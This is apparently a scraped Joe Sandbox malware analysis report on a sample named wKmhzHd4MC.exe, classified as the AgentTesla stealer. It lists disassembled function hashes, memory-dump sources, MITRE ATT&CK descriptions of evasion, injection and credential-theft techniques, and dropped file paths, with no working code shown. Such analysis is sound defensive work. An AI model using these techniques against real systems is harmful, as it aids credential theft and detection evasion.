Opcode ID: 490c9ded41ca23d10db1818611ebd313789e09174b0c3d19eb80a8df9fff7281
Instruction ID: 4f52a21a5a68e377c0ca50da1da46cd7f8215152ce16e1943fe981866c8b1436
Opcode Fuzzy Hash: 490c9ded41ca23d10db1818611ebd313789e09174b0c3d19eb80a8df9fff7281
Instruction Fuzzy Hash: 4D21B2786041414FDB53FB28E9887593BA6FF46718F044AA5D0C6CB26EEA34CC9B9B41

Function 010892E0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2968130680.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b88ff4564100640ef5d0a2eb7e9dbeec672d0e3d376270f814d58d5f0469bf63
Instruction ID: 121874f010956cc1bd6b985f43eded906f554258f2e684112929f843a24ddf60
Opcode Fuzzy Hash: b88ff4564100640ef5d0a2eb7e9dbeec672d0e3d376270f814d58d5f0469bf63
Instruction Fuzzy Hash: 7E216131E0420A9BDB05EFA9D4906AEF7B6BFC9304F14D559E845EB381DB709886CB90

Function 010891D0 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2968130680.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfdcdac2a52fd24d4a4179d0e498a5f5e8c5a9e2154b9743763ee6f595580e98
Instruction ID: 9f3d6a4b394d853252f834d95a88b4fb0157b33d52fae0108918103e7d07e9f9
Opcode Fuzzy Hash: dfdcdac2a52fd24d4a4179d0e498a5f5e8c5a9e2154b9743763ee6f595580e98
Instruction Fuzzy Hash: FF21A731E0420A9BDF09EFA4D4449EEF7B2BFC9314F14865AE855BB351DB709846CB50

Function 00EBD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2967323354.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ebd000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0ddea6f4141cf8f14ebd7d4d82199d9aa5b7866ddcaf642442919db2ca04a66
Instruction ID: 624c97ea8905650674b5a68d6290c8e1a430d1aa06d561822802413e93c4ee0e
Opcode Fuzzy Hash: d0ddea6f4141cf8f14ebd7d4d82199d9aa5b7866ddcaf642442919db2ca04a66
Instruction Fuzzy Hash: 6D210475608200DFCB14EF14D9C4B67BFA6FB88318F24C56DD84A5B296D33AD847CA61

Function 00EBD1E4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2967323354.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ebd000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1f97e6a65b544cd3be69f8d901ebddb08f8145f827340d27638f54134434dae
Instruction ID: b6eccd2d075df44a61a960aa446ed1b4bc0ef86c99794dfcc1ecae23cca8a291
Opcode Fuzzy Hash: b1f97e6a65b544cd3be69f8d901ebddb08f8145f827340d27638f54134434dae
Instruction Fuzzy Hash: BA212671508284DFDB00DF14D984BABBB65FB84324F20C669D9095B266D33AD846CAA1

Function 00EBD394 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2967323354.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ebd000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae6da87239f4d9e3b099960de011493c7f91276dd9754664b1bc8fffe1fdd507
Instruction ID: 6e991fec3bb676abe5c42c2894ca044fc57e688d3bfdb62c33b40982b9806b55
Opcode Fuzzy Hash: ae6da87239f4d9e3b099960de011493c7f91276dd9754664b1bc8fffe1fdd507
Instruction Fuzzy Hash: 9621F271608200EFCB05DF14D9C0B67BFA5FB84318F24C5A9D80A5B292D736E846CA62

Function 01081840 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2968130680.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0888cd748ec6834f0aecbddbb56bc4f2b0a3303f8618f3e0da7b5ee993b5ffae
Instruction ID: 0dc8d2828ab462b206c9865cdd7f4cd78998eb059e1c5bc655761baee30ebb18
Opcode Fuzzy Hash: 0888cd748ec6834f0aecbddbb56bc4f2b0a3303f8618f3e0da7b5ee993b5ffae
Instruction Fuzzy Hash: 2B218E30708205CFDB55EB79C519B9EBBF6AF49304F1005A8D582EB391EB369D02CB91

Function 010891E0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2968130680.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab64e778ba55a85f4323dd384228213dfde2a8a65e07ac0e002a262360f44f35
Instruction ID: 51427a16285b474fb3bed0df2ecd70df978651caa4a93e4f81e07e6ff940bb02
Opcode Fuzzy Hash: ab64e778ba55a85f4323dd384228213dfde2a8a65e07ac0e002a262360f44f35
Instruction Fuzzy Hash: 89218031E0420A9BCB09EFA9C4449AEB7B2BFC9304F14861AE855BB340DB709846CB50

Function 01081850 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2968130680.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8561399a6f5d8e1644504e6c4206b610cf54234a52fa3ed6766e5f6e14881298
Instruction ID: 5ceb24070740ac42d600b17a871d5bdcd4f526fcf58ec6047451b058bd6662c9
Opcode Fuzzy Hash: 8561399a6f5d8e1644504e6c4206b610cf54234a52fa3ed6766e5f6e14881298
Instruction Fuzzy Hash: 4F215E30B04205CFDB55EB68C5157AE77F6AF49205F1005A8D586EB390DF369D42CBA1

Function 01084F53 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2968130680.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78f761d77aa5b087964f7211a953e6ed7443864cecd6c0c3f91f7420cb1d0fbf
Instruction ID: b7d7f5597a446a04ae4f30ab5f330a3d7b2c32ad8d5498d39ab0a4b3234bb3de
Opcode Fuzzy Hash: 78f761d77aa5b087964f7211a953e6ed7443864cecd6c0c3f91f7420cb1d0fbf
Instruction Fuzzy Hash: C4212834700249CFDB55EB38CA59BAE7BF2AF49204F1044A8E446EB361DB35DD02DB51

Function 01081678 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2968130680.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc613aaf46fa858f975a032209d526eef15029aa7fb6e2514d0c6ce9ac1061a8
Instruction ID: 6608e54cd8db96db115e7bb2a7b3a6d20b4a05c46a51438a50345ec07fa60952
Opcode Fuzzy Hash: fc613aaf46fa858f975a032209d526eef15029aa7fb6e2514d0c6ce9ac1061a8
Instruction Fuzzy Hash: 292193786041414FDF53FB28E884B197766FF46718F104E75D086C726EEA34DC8A8B81

Function 01084F60 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2968130680.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b75df5242f5f0305def73c6b7b308db32383eed4001740d8af347c1b0593622a
Instruction ID: a8ba07da8d01d928382c26789977ab437bee9e0b83435f6a25dd21c11efb92a2
Opcode Fuzzy Hash: b75df5242f5f0305def73c6b7b308db32383eed4001740d8af347c1b0593622a
Instruction Fuzzy Hash: 8121E934704209CFDB54EB78CA59B9D7BF1AF49204F1044A8E546EB361EB359D02DB91

Function 00EBD005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2967323354.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ebd000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14acfc0da0d8d3aa18ad883a48d7669a389db2a4b5da51fe537475ac27c6d9b4
Instruction ID: 4f1cb432e4cf66e8658b757a8bd1b0f1aa87acc53dfe0690c4172bb2b4ff3e85
Opcode Fuzzy Hash: 14acfc0da0d8d3aa18ad883a48d7669a389db2a4b5da51fe537475ac27c6d9b4
Instruction Fuzzy Hash: 5521837550D3808FCB02DF24D994756BF71EB46314F28C5DAD8498F2A7C33A980ACB62

Function 01080848 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2968130680.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e1334d7b3ae3c243f4ec7779bc45b3c795b30aac9a0b372fe0f10551f8ca8f0
Instruction ID: 494df36e862059d92c5ecc6488ca02027a26fdd44cdd28bac4556d92dea26db0
Opcode Fuzzy Hash: 8e1334d7b3ae3c243f4ec7779bc45b3c795b30aac9a0b372fe0f10551f8ca8f0
Instruction Fuzzy Hash: 99117930B282058BDFA5BA79D44432A72E5EB46314F1089B9F0C6DB24ADA21CCC98BC1

Function 01080847 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2968130680.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8cb23ce4254cab61f24a5a38ef60f9c82be02e297e7580bdec055d3d72a432a
Instruction ID: 07650b11c5daedf22ff776cd4e567bcc1226a49f85cf7eb40b1b7cbedec4aa21
Opcode Fuzzy Hash: c8cb23ce4254cab61f24a5a38ef60f9c82be02e297e7580bdec055d3d72a432a
Instruction Fuzzy Hash: D4117C30B282059BEFA67679D44436E76D1EB46314F1049B9F0C6DB28ADA65CCC98BC1

Function 00EBD38F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2967323354.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ebd000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 240ebd1f5fc5a8b135da9668c93c91c3957967a2b85b29ad974d2f9e833438ea
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: A1119075508240DFDB06CF14D9C4B56BF72FB84318F24C6A9D8494B656C33AE84ACF52

Function 00EBD1DF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2967323354.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ebd000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
Instruction ID: 350ca6d8a2726c4c5563a0ddc6857f66c8b9fbfcc7f2a71e88ed748d040fe067
Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
Instruction Fuzzy Hash: 6011C475508280CFDB12CF14D9C4B56FF71FB84328F24C6AAD8495B656C33AD80ACB91

Function 01081460 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2968130680.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 758a20e18419cfc7a8caed5fdf353c211b73f689ba68d5f5a354302837dfc687
Instruction ID: 562ca4480695dfb2071a6c15e0ed888b14e25d463aa169e3c397dba334a9127a
Opcode Fuzzy Hash: 758a20e18419cfc7a8caed5fdf353c211b73f689ba68d5f5a354302837dfc687
Instruction Fuzzy Hash: 37016D31A052158FCF61FFBC84401AEBBE4AF48220B1454BAE8C5E7701EB35E942CBA1

Function 00EAD89D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2967219545.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ead000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3259a0e84a94451676d90b60f275df00be826154b33ed595a5a3539460f77962
Instruction ID: e92599b15043555823f88887bfde5c2f7e7634fff418b3a7558383e5c39ed5db
Opcode Fuzzy Hash: 3259a0e84a94451676d90b60f275df00be826154b33ed595a5a3539460f77962
Instruction Fuzzy Hash: B8012B7100C3449AE7144A25DD84767FFDCEF4A724F18C42AED4A6E586C67DEC40CA71

Function 00EAD89C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2967219545.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ead000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b65a0b7a07ad3af6b1187b5fc28d2c5442256eff4f10049bd17dd1f29b64378
Instruction ID: 46c9a374f47a4ea40757330e91512d1f2c9fde85e5fad0d7d51ad868b00ab13c
Opcode Fuzzy Hash: 1b65a0b7a07ad3af6b1187b5fc28d2c5442256eff4f10049bd17dd1f29b64378
Instruction Fuzzy Hash: C7F0C2714083449AE7108A16DC88B67FFA8EB96728F18C45AED491E686C279AC40CA71

Function 01088170 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2968130680.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca927906c3d5cfb6e16b3664269d23f0bd055a20da998b4f836140e5c67e1efe
Instruction ID: faae2a5cacb2906733ed1493e67189b32dda280176fc41322787336dc07d9159
Opcode Fuzzy Hash: ca927906c3d5cfb6e16b3664269d23f0bd055a20da998b4f836140e5c67e1efe
Instruction Fuzzy Hash: 21014474940249EFDB06FBB4EA4068DBFB5EF46304F104579C408EB299DF30AE459791

Function 010814EC Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2968130680.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8758379b1fddb429ab6be5d394e81b7156026600971b31ac2aa49b3d3152b0cc
Instruction ID: cc28e8d4fbad8a7a166cb821bd9ea9656bacde775311e7672aa6f6dc537ccde8
Opcode Fuzzy Hash: 8758379b1fddb429ab6be5d394e81b7156026600971b31ac2aa49b3d3152b0cc
Instruction Fuzzy Hash: B8F0F633A0C150CFDB21ABAC84901ACBBA0FEA516171950D7D8C5DBA12DB35D443C711

Function 01088180 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2968130680.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_wKmhzHd4MC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6769c318c52c60f5a95ee1e666d8bd88759112edb665fdeb5044f4c7da7e1bf
Instruction ID: b79cf6035263984bb8f41652c352001b8d8a01a4f29bb92d04897905a5cd4bcc
Opcode Fuzzy Hash: d6769c318c52c60f5a95ee1e666d8bd88759112edb665fdeb5044f4c7da7e1bf
Instruction Fuzzy Hash: 23F03134940149AFCB45FBB8EA80A9DBBF5EB45304F504578C008AB259DF306E459B91

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report wKmhzHd4MC.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wKmhzHd4MC.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nx14kgao.zu4.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_poe4perv.5q2.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qwip5pf4.4as.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tmvh2zmg.ghe.psm1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Windows Analysis Report
wKmhzHd4MC.exe

Function 011AD051 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Function 011AD060 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 011AADC8 Relevance: 1.7, APIs: 1, Instructions: 210
COMMON

Function 011A590C Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Function 011A44B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 011AD6A9 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

